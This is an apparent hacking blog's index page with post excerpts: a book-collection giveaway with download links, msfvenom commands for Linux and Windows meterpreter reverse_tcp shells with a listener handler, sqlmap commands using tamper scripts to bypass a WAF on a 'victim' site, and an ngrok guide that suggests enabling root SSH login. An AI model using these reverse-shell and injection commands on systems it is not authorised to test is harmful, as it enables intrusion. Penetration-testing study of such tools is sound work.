Skip to main content

Posts

Osmedeus - Automatic Reconnaisance and Scanning in Penetration Testing (...

Pupy - Metasploit Post-Exploitaion in Python with more awesome features

[Resource Sharing] Best books collections for hacking

Today I'm gonna give away the best books collections  for hacking from my " library ". Below is the details of the collections(download link including): Advanced Persistent Threat Hacking, The Art & Science Attacking Network Protocols A Hacker’s Guide to Capture Analysis and Exploitation Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters Digital Forensics and Incident Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005) Fuzzing Brute Force Vulnerability Discovery Google Hacking for Penetration Testers Volume2 - Nov 2007 Google_Hacking Google.Hacking.Filters Gray Hat Hacking The Ethical Hacker’s Handbook Fifth Edition Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009) Hacking Exposed 2.0 (Web) Best Book Hacking Exposed Computer Forensics 2nd Edition Hacking Exposed Linux, 3rd Edition Hacking Exposed Mobile Security Secrets & Solutions Hacking Exposed Unified Communications & VoIP, 2nd

Sql injection to shell

Creating Metasploit Payloads

Creating Metasploit Payloads Metasploit - Most Used Pen Testing Tool Usually when you use metasploit, you need to create a payload and send that payload to your victim. Here is some useful command to create payload for many platform. Acronym for this post: LHOST: local host - commonly is attacker IP LPORT: local port - default is 4444 RHOST: remote host - commonly is victim IP [Handlers] Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z [List payloads] msfvenom -l [Binaries] Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Addr

Advanced Sqlmap - Metasploit for SQL Injection.

Advanced Sqlmap - Metasploit for SQL Injection. [?] What is SQL Injection? I'm not describe what is SQL Injection in this post, please check https://www.owasp.org/index.php/SQL_Injection [?] Why we use sqlmap? - This is a automatic SQL injection tool. - Provide many advanced technique that I'll show you in this post. - Open source and highly scalable. - Easy to install. [*] Sqlmap source https://github.com/sqlmapproject/sqlmap All you need is python 2.x and Internet connection: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev [*] Well, now I'm gonna show you some advanced technique. [Bypass WAF using sqlmap tamper script] python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs You can also use more tamper script but it depend on your victim DBMS. ( use too much tamper script is not RECOMMEND ) Here is

How to open port forwarding without router with ngrok

[*] Hi everyone, today I'm gonna show you how to open port forwarding without router with ngrok. [?] Why you need to open port forwarding? => Obviously, sometimes you need to access service your machine from outside local network like SSH, HTTP, etc but some reason you can't set it up on your router. [Installation] - Firstly, you need to download ngrok from  https://ngrok.com/download - Sign up an account if you want to open any tcp port.  After that type this command to  Install your authtoken: ./ngrok authtoken  <your_auth_token> - Type the command below if you want run ngrok directly from terminal: cp ~/Download/ngrok /usr/bin/ [!]  ' ~/Download/ngrok ' is location of ngrok file. [Usage] - You need to start the service that you want to access. For example I'll start apache2. service apache2 start [!]  Make sure you modify sshd_config file to allow root login if you want to login ssh as root - Now time to run ngrok: ngrok htt